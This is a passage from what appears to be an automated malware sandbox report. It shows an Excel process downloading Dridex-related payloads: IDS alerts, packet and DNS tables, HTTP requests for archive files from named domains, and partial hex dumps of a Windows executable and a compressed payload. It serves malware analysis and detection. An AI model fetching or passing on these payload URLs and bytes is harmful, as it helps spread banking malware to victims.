                01/13/21-16:40:49.550000 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49285 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:40:49.870457 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49284 | 221.126.244.72 | 192.168.2.22
                01/13/21-16:40:51.482181 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49287 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:40:52.937918 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49289 | 221.126.244.72 | 192.168.2.22
                01/13/21-16:40:54.586304 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49291 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:40:54.830256 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49290 | 221.126.244.72 | 192.168.2.22
                01/13/21-16:40:56.427479 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49293 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:40:58.046723 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49295 | 221.126.244.72 | 192.168.2.22
                01/13/21-16:40:59.642472 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49297 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:40:59.820721 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49296 | 221.126.244.72 | 192.168.2.22
                01/13/21-16:41:01.463571 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49299 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:41:03.014342 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49301 | 221.126.244.72 | 192.168.2.22
                01/13/21-16:41:04.632798 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49303 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:41:04.848008 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49302 | 221.126.244.72 | 192.168.2.22
                01/13/21-16:41:06.449747 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49305 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:41:07.996817 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49307 | 221.126.244.72 | 192.168.2.22
                01/13/21-16:41:09.614295 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49309 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:41:09.845252 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49308 | 221.126.244.72 | 192.168.2.22
                01/13/21-16:41:11.453807 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49311 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:41:13.039382 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49313 | 221.126.244.72 | 192.168.2.22

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 13, 2021 16:39:00.016732931 CET | 49165 | 80 | 192.168.2.22 | 35.214.225.210
Jan 13, 2021 16:39:00.066108942 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.066272020 CET | 49165 | 80 | 192.168.2.22 | 35.214.225.210
Jan 13, 2021 16:39:00.067065001 CET | 49165 | 80 | 192.168.2.22 | 35.214.225.210
Jan 13, 2021 16:39:00.116235971 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.116538048 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.116590977 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.116631031 CET | 49165 | 80 | 192.168.2.22 | 35.214.225.210
Jan 13, 2021 16:39:00.116635084 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.116666079 CET | 49165 | 80 | 192.168.2.22 | 35.214.225.210
Jan 13, 2021 16:39:00.116677046 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.116683960 CET | 49165 | 80 | 192.168.2.22 | 35.214.225.210
Jan 13, 2021 16:39:00.116719007 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.116719961 CET | 49165 | 80 | 192.168.2.22 | 35.214.225.210
Jan 13, 2021 16:39:00.116761923 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.116774082 CET | 49165 | 80 | 192.168.2.22 | 35.214.225.210
Jan 13, 2021 16:39:00.116801023 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.116806984 CET | 49165 | 80 | 192.168.2.22 | 35.214.225.210
Jan 13, 2021 16:39:00.116841078 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.116848946 CET | 49165 | 80 | 192.168.2.22 | 35.214.225.210
Jan 13, 2021 16:39:00.116882086 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.116924047 CET | 49165 | 80 | 192.168.2.22 | 35.214.225.210
Jan 13, 2021 16:39:00.116929054 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.116950035 CET | 49165 | 80 | 192.168.2.22 | 35.214.225.210
Jan 13, 2021 16:39:00.116985083 CET | 49165 | 80 | 192.168.2.22 | 35.214.225.210
Jan 13, 2021 16:39:00.123063087 CET | 49165 | 80 | 192.168.2.22 | 35.214.225.210
Jan 13, 2021 16:39:00.166317940 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.166337967 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.166357040 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.166376114 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.166392088 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.166409016 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.166424990 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.166440010 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.166469097 CET | 49165 | 80 | 192.168.2.22 | 35.214.225.210
Jan 13, 2021 16:39:00.166498899 CET | 49165 | 80 | 192.168.2.22 | 35.214.225.210
Jan 13, 2021 16:39:00.166507006 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.166558981 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.166562080 CET | 49165 | 80 | 192.168.2.22 | 35.214.225.210
Jan 13, 2021 16:39:00.166591883 CET | 49165 | 80 | 192.168.2.22 | 35.214.225.210
Jan 13, 2021 16:39:00.166659117 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.166676044 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.166688919 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.166732073 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.166744947 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.166790962 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.166810036 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.166830063 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.166852951 CET | 49165 | 80 | 192.168.2.22 | 35.214.225.210
Jan 13, 2021 16:39:00.166877031 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.166898012 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.166906118 CET | 49165 | 80 | 192.168.2.22 | 35.214.225.210
Jan 13, 2021 16:39:00.166924000 CET | 49165 | 80 | 192.168.2.22 | 35.214.225.210
Jan 13, 2021 16:39:00.166953087 CET | 49165 | 80 | 192.168.2.22 | 35.214.225.210
Jan 13, 2021 16:39:00.168648958 CET | 49165 | 80 | 192.168.2.22 | 35.214.225.210
Jan 13, 2021 16:39:00.215877056 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.215929985 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.215970993 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.215982914 CET | 49165 | 80 | 192.168.2.22 | 35.214.225.210
Jan 13, 2021 16:39:00.216010094 CET | 49165 | 80 | 192.168.2.22 | 35.214.225.210
Jan 13, 2021 16:39:00.216012001 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.216018915 CET | 49165 | 80 | 192.168.2.22 | 35.214.225.210
Jan 13, 2021 16:39:00.216051102 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.216063023 CET | 49165 | 80 | 192.168.2.22 | 35.214.225.210
Jan 13, 2021 16:39:00.216090918 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.216094017 CET | 49165 | 80 | 192.168.2.22 | 35.214.225.210
Jan 13, 2021 16:39:00.216130018 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.216146946 CET | 49165 | 80 | 192.168.2.22 | 35.214.225.210
Jan 13, 2021 16:39:00.216173887 CET | 49165 | 80 | 192.168.2.22 | 35.214.225.210
Jan 13, 2021 16:39:00.216178894 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.216224909 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.216231108 CET | 49165 | 80 | 192.168.2.22 | 35.214.225.210
Jan 13, 2021 16:39:00.216264009 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.216290951 CET | 49165 | 80 | 192.168.2.22 | 35.214.225.210
Jan 13, 2021 16:39:00.216304064 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.216317892 CET | 49165 | 80 | 192.168.2.22 | 35.214.225.210
Jan 13, 2021 16:39:00.216345072 CET | 49165 | 80 | 192.168.2.22 | 35.214.225.210
Jan 13, 2021 16:39:00.216345072 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.216382980 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.216394901 CET | 49165 | 80 | 192.168.2.22 | 35.214.225.210
Jan 13, 2021 16:39:00.216419935 CET | 49165 | 80 | 192.168.2.22 | 35.214.225.210
Jan 13, 2021 16:39:00.216423035 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.216464996 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.216471910 CET | 49165 | 80 | 192.168.2.22 | 35.214.225.210
Jan 13, 2021 16:39:00.216514111 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.216517925 CET | 49165 | 80 | 192.168.2.22 | 35.214.225.210
Jan 13, 2021 16:39:00.216558933 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.216563940 CET | 49165 | 80 | 192.168.2.22 | 35.214.225.210
Jan 13, 2021 16:39:00.216598034 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.216614008 CET | 49165 | 80 | 192.168.2.22 | 35.214.225.210
Jan 13, 2021 16:39:00.216638088 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.216653109 CET | 49165 | 80 | 192.168.2.22 | 35.214.225.210
Jan 13, 2021 16:39:00.216681957 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.216696024 CET | 49165 | 80 | 192.168.2.22 | 35.214.225.210
Jan 13, 2021 16:39:00.216748953 CET | 49165 | 80 | 192.168.2.22 | 35.214.225.210
Jan 13, 2021 16:39:00.216804028 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.216854095 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.216856003 CET | 49165 | 80 | 192.168.2.22 | 35.214.225.210
Jan 13, 2021 16:39:00.216897964 CET | 80 | 49165 | 35.214.225.210 | 192.168.2.22
Jan 13, 2021 16:39:00.216902018 CET | 49165 | 80 | 192.168.2.22 | 35.214.225.210

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 13, 2021 16:38:59.945688009 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8
Jan 13, 2021 16:39:00.002125978 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22
Jan 13, 2021 16:39:01.100547075 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8
Jan 13, 2021 16:39:01.159426928 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22
Jan 13, 2021 16:39:07.247589111 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8
Jan 13, 2021 16:39:07.305043936 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22
Jan 13, 2021 16:39:07.312721968 CET | 61200 | 53 | 192.168.2.22 | 8.8.8.8
Jan 13, 2021 16:39:07.313422918 CET | 49548 | 53 | 192.168.2.22 | 8.8.8.8
Jan 13, 2021 16:39:07.361232996 CET | 53 | 49548 | 8.8.8.8 | 192.168.2.22
Jan 13, 2021 16:39:07.380466938 CET | 53 | 61200 | 8.8.8.8 | 192.168.2.22

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 13, 2021 16:38:59.945688009 CET | 192.168.2.22 | 8.8.8.8 | 0x15d4 | Standard query (0) | bipolarmalta.mccarthy.ws | A (IP address) | IN (0x0001)
Jan 13, 2021 16:39:01.100547075 CET | 192.168.2.22 | 8.8.8.8 | 0x2642 | Standard query (0) | oudtshoornpharmacies.co.za | A (IP address) | IN (0x0001)
Jan 13, 2021 16:39:07.312721968 CET | 192.168.2.22 | 8.8.8.8 | 0x887e | Standard query (0) | sendgrid.invoteqleads.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 13, 2021 16:39:00.002125978 CET | 8.8.8.8 | 192.168.2.22 | 0x15d4 | No error (0) | bipolarmalta.mccarthy.ws |  | 35.214.225.210 | A (IP address) | IN (0x0001)
Jan 13, 2021 16:39:01.159426928 CET | 8.8.8.8 | 192.168.2.22 | 0x2642 | No error (0) | oudtshoornpharmacies.co.za |  | 154.66.197.71 | A (IP address) | IN (0x0001)
Jan 13, 2021 16:39:07.380466938 CET | 8.8.8.8 | 192.168.2.22 | 0x887e | No error (0) | sendgrid.invoteqleads.com |  | 104.24.124.127 | A (IP address) | IN (0x0001)
Jan 13, 2021 16:39:07.380466938 CET | 8.8.8.8 | 192.168.2.22 | 0x887e | No error (0) | sendgrid.invoteqleads.com |  | 172.67.195.135 | A (IP address) | IN (0x0001)
Jan 13, 2021 16:39:07.380466938 CET | 8.8.8.8 | 192.168.2.22 | 0x887e | No error (0) | sendgrid.invoteqleads.com |  | 104.24.125.127 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• bipolarmalta.mccarthy.ws
• oudtshoornpharmacies.co.za
• sendgrid.invoteqleads.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49165 | 35.214.225.210 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | kBytes transferred | Direction | Data
Jan 13, 2021 16:39:00.067065001 CET | 0 | OUT | GET /lpxtpiw.zip HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: bipolarmalta.mccarthy.ws
Connection: Keep-Alive
Jan 13, 2021 16:39:00.116538048 CET | 2 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 13 Jan 2021 15:38:57 GMT
Content-Type: application/zip
Content-Length: 303616
Connection: keep-alive
Last-Modified: Fri, 18 Dec 2020 21:13:44 GMT
ETag: "4a200-5b6c39557f200"
alt-svc: quic=":443"; ma=86400; v="43,39"
Host-Header: 624d5be7be38418a3e2a818cc8b7029b
X-Proxy-Cache: HIT
Accept-Ranges: bytes
                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 f6 fb fe 5f 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 02 32 00 72 04 00 00 2c 00 00 00 00 00 00 e0 1c 00 00 00 10 00 00 00 30 00 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 10 05 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c 63 00 00 c8 00 00 00 00 f0 04 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 dc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 68 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ae 19 00 00 00 10 00 00 00 1a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e1 00 00 00 00 30 00 00 00 02 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 32 00 00 00 00 00 00 0a 00 00 00 00 40 00 00 00 02 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 64 61 74 61 32 00 0a 00 00 00 00 50 00 00 00 02 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d8 1c 00 00 00 60 00 00 00 1e 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 35 00 00 50 02 00 00 00 80 00 00 00 04 00 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 74 65 78 74 34 00 00 cc 52 04 00 00 90 00 00 00 54 04 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 72 
73 72 63 00 00 00 e8 00 00 00 00 f0 04 00 00 02 00 00 00 9a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 dc 05 00 00 00 00 05 00 00 06 00 00 00 9c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_!2r,0ch.text `.rdata0@@.2@ @@.rdata2P"@@.data`$@.text5PB @.text4RTF @.rsrc@@.reloc@B


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49166 | 154.66.197.71 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | kBytes transferred | Direction | Data
Jan 13, 2021 16:39:01.389254093 CET | 323 | OUT | GET /dyu828kp.rar HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: oudtshoornpharmacies.co.za
Connection: Keep-Alive
Jan 13, 2021 16:39:01.620605946 CET | 324 | IN | HTTP/1.1 200 OK
Date: Wed, 13 Jan 2021 15:39:01 GMT
Server: Apache
Last-Modified: Wed, 16 Dec 2020 13:39:12 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-rar-compressed
                Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec fd 09 58 53 c7 fb 3f 0c cf 39 80 82 a2 41 05 83 82 4b c9 d1 a8 6c 21 c1 ad 68 45 41 d1 82 1a d9 82 82 0a 42 48 08 08 14 42 5d 40 c1 12 aa 78 48 b5 8a c6 85 ba a1 62 dd 00 45 45 50 a1 6e 68 41 41 5c 62 85 56 ea 96 a3 b8 50 b5 75 e7 3c f7 24 d0 26 fd fe fe cf ff 7d af eb ff 5c ef f5 3e d7 97 f6 36 f7 99 99 f3 99 ed 9e 7b 3e 73 32 67 32 7d ce 5a 64 86 10 32 07 61 59 84 ca 91 e1 cf 1b fd ef ff b2 40 7a 0e aa e8 89 ca ac ae 7c 56 4e 04 5c f9 2c 58 1e 97 3a 38 39 25 49 96 12 b5 70 70 74 54 62 62 92 72 f0 02 e9 e0 94 b4 c4 c1 71 89 83 7d 67 06 0d 5e 98 14 23 75 eb d1 a3 1b d5 81 21 9e 8c 50 00 61 85 82 9a da e7 77 e2 b6 a0 9e 9f 75 27 48 21 4a 81 52 b9 74 84 39 c2 3f 36 20 02 fd a5 8d 5e 27 0d e5 46 e8 9f 4f 64 63 f1 f7 05 d9 91 54 9f f6 ef cf bf 3f f4 7f 79 d1 08 5d c2 4a 9b 39 62 fe c7 5a 5a a0 66 8b ff 0f 1a e3 5f 7f e6 72 84 4a cc fe d7 f1 6e 4a e9 62 25 7c 1e ee d7 51 a0 fe c8 a8 12 86 bf c1 08 45 ba a5 c4 44 29 a3 10 fa 1d 07 08 90 a1 52 03 4d d3 79 c3 ff 6e 42 83 de ad 23 40 9f 6e f0 ff 90 4e 8f 27 34 a4 13 77 a4 73 fa 1f d2 19 b2 45 b7 71 bb 47 76 e4 49 fd 47 ba 6a 7d 3d 46 02 14 c6 c9 ea a8 c3 a4 ff a8 87 b7 3e 9d 27 42 75 81 90 60 2d 04 06 c3 e7 94 ff 21 5d 4a 6a 0a 74 89 a1 2f a0 4f f4 e5 db 62 da 30 86 7a 48 13 92 20 a1 a1 6f e0 9f 2e f0 51 f0 1f e9 fe 55 92 ff fe fd fb 2f 84 7e 5a 63 b1 2f 03 d9 8c 5d 87 6c 76 62 c5 75 24 34 79 21 d6 f4 97 73 cf d5 19 ff 41 fa 59 a1 f4 64 eb dc c9 1f e9 1e 07 21 3e 77 ba a5 3c a2 17 42 0a c4 da 29 23 91 0d 1d f2 51 5d 46 c6 ee ec 82 4c 82 cd da e8 c9 96 66 02 7a ba 65 ae 07 1d 62 49 93 ae 38 09 be 24 e6 d1 0f ff c9 04 f0 4d 72 d4 97 2f 38 c3 30 66 77 aa 40 31 d3 5f 16 e2 bc e9 1e 58 9d 25 7f 39 00 0c 66 01 cb b2 d9 e7 2d 69 3b 7d a9 ec 4a 70 05 70 b4 c5 72 01 d4 a7 0c 34 66 02 58 bd e1 9e ec 9f cc 73 f5 4a 8d 45 32 94 ee 8f 0a 84 fe ab fd 57 fb af f6 5f ed bf da 7f b5 ff 6a ff d5 fe ab fd 9f d0 68 3b cc b2 bc ec bc e1 df 14 b2 b5 47 b9 f3 7e 84 72 aa 
39 39 82 bf 58 16 98 1e e6 93 3b b3 30 97 9b fa 31 77 fa 47 60 8f b9 fa b4 34 f0 cb 87 86 f8 ec a7 f6 a1 92 9a c9 6f 31 03 ac 99 dc 66 44 04 63 30 d3 c3 44 14 03 98 f5 90 eb e9 28 43 87 30 b9 21 af cb e7 8b 70 46 ca f1 f4 f4 b7 5e 3d 76 18 b2 17 d0 69 6f cd d2 da e8 65 6f cd 96 b5 99 f2 53 80 09 79 bd da 5a b8 ca 7a 0c 1d f2 36 fb 2c 91 1b f2 b6 b5 62 27 be b1 70 2a fc 33 7f 5e 67 79 76 62 6a 59 58 8e 09 e5 6f d6 08 99 12 64 3d 5f 5d db c1 57 99 ab 5d 71 5b 04 c0 25 81 2f d7 bc 66 d9 42 5c 56 79 23 81 97 38 7a c6 6a 5e 88 eb bb 13 ff 53 78 0a c7 2d 86 e2 c8 57 c1 3f ac 1d ac 22 6d c4 ac 9d 25 7c 14 56 43 5c b9 37 c0 88 4f e2 85 e0 2c 76 24 4e cd 8e cc d3 ff 8b 63 67 d3 3d f0 07 5d fd bf fb 4f fe d1 01 68 f3 b9 c2 f3 7a 0e 8d ff cd ed 81 5b 94 d6 37 7d ae 9d af 9e 18 8b e1 df 33 07 a1 b1 c5 fa 64 38 81 3a 9f 28 a9 32 43 b9 76 38 48 1f ee 8a 53 14 8a f5 37 c4 74 54 9b ee a1 ef 18 7d 7f d4 58 44 c2 bf d0 4c 1d ed a4 ef ef b0 8e 7e 93 7e 0c a3 99 9d 4a b8 12 ef c4 8d 24 a6 1b ff bf fa 4f 5f 8c c0 73 ff 9b f5 43 f6 53 4b 58 71 e4 da e1 7c 72 5d 71 de
                Data Ascii: 1faaXS?9AKl!hEABHB]@xHbEEPnhAA\bVPu<$&}\>6{>s2g2}Zd2aY@z|VN\,X:89%IpptTbbrq}g^#u!Pawu'H!JRt9?6 ^'FOdcT?y]J9bZZf_rJnJb%|QED)RMynB#@nN'4wsEqGvIGj}=F>'Bu`-!]Jjt/Ob0zH o.QU/~Zc/]lvbu$4y!sAYd!>w<B)#Q]FLfzebI8$Mr/80fw@1_X%9f-i;}Jppr4fXsJE2W_jh;G~r99X;01wG`4o1fDc0D(C0!pF^=vioeoSyZz6,b'p*3^gyvbjYXod=_]W]q[%/fB\Vy#8zj^Sx-W?"m%|VC\7O,v$Ncg=]Ohz[7}3d8:(2Cv8HS7tT}XDL~~J$O_sCSKXq|r]q


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49169 | 104.24.124.127 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | kBytes transferred | Direction | Data
Jan 13, 2021 16:39:07.434938908 CET | 584 | OUT | GET /usc3d1.rar HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
